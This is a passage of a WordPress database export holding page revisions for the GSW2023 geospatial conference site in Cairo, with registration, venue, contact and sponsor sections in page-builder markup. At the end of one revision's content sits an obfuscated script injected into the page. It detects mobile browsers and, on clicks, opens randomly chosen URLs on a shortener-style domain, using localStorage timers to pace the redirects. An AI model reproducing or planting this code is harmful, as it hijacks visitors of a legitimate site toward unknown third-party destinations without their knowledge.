!important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:17:09','2023-05-17 05:17:09','',3066,'https://gsw2023.com/?p=4524',0,'revision','',0),
(4525,1,'2023-05-17 05:18:43','2023-05-17 05:18:43','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][/vc_column_inner]\r\n\r\n[vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOUR HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" 